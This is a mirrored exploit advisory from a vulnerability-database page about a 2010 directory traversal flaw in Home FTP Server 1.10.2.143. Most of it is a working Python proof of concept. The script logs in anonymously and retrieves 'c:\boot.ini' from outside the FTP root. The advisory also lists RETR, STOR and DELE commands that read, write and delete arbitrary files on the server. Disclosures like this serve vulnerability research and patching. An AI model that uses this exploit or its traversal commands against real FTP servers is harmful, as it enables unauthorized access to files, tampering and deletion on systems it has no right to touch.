Lucene search
K

Home FTP Server 1.10.2.143 Directory Traversal

🗓️ 28 May 2010 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Directory Traversal vulnerability in Home FTP Server 1.10.2.143 allows read, write, and delete outside ftp root director

Code
`#============================================================================================================#  
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #  
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #  
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #  
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #  
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #  
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #  
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #  
# #  
#============================================================================================================#  
# #  
# Vulnerability............Directory Traversal #  
# Software.................Home FTP Server 1.10.2.143 #  
# Download.................http://downstairs.dnsalias.net/files/HomeFtpServerInstall.exe #  
# Date.....................5/27/10 #  
# #  
#============================================================================================================#  
# #  
# Site.....................http://cross-site-scripting.blogspot.com/ #  
# [email protected] #  
# #  
#============================================================================================================#  
# #  
# ##Description## #  
# #  
# A directory traversal vulnerability in Home FTP Server 1.10.2.143 can be exploited to read, write, and #  
# delete files outside of the ftp root directory. #  
# #  
# #  
# ##Exploit## #  
# #  
# RETR [Drive Letter]:\[Filename] #  
# STOR [Drive Letter]:\[Filename] #  
# DELE [Drive Letter]:\[Filename] #  
# #  
# #  
# ##Proof of Concept## #  
# #  
import sys, socket, re  
  
host = 'localhost'  
port = 21  
user = 'anonymous'  
password = ''  
  
timeout = 8  
  
buffer_size = 8192  
  
def get_data_port(s):  
s.send('PASV\r\n')  
  
resp = s.recv(buffer_size)  
  
pasv_info = re.search(u'(\d+),' * 5 + u'(\d+)', resp)  
  
if (pasv_info == None):  
raise Exception(resp)  
  
return int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))  
  
def retr_file(s, filename):  
pasv_port = get_data_port(s)  
  
if (pasv_port == None):   
return None   
  
s.send('RETR ' + filename + '\r\n')  
resp = s.recv(8192)   
  
if resp[:3] != '150': raise Exception(resp)  
  
print resp  
  
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   
s2.connect((host, pasv_port))  
s2.settimeout(2.0)   
resp = s2.recv(8192)  
s2.close()   
  
return resp  
  
def get_file(filename):  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, port))  
s.settimeout(timeout)  
  
print s.recv(buffer_size)   
  
s.send('USER ' + user + '\r\n')   
print s.recv(buffer_size)   
  
s.send('PASS ' + password + '\r\n')   
print s.recv(buffer_size)  
  
print retr_file(s, filename)  
  
print s.recv(buffer_size)   
  
s.close()  
  
get_file('c:\\boot.ini')  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation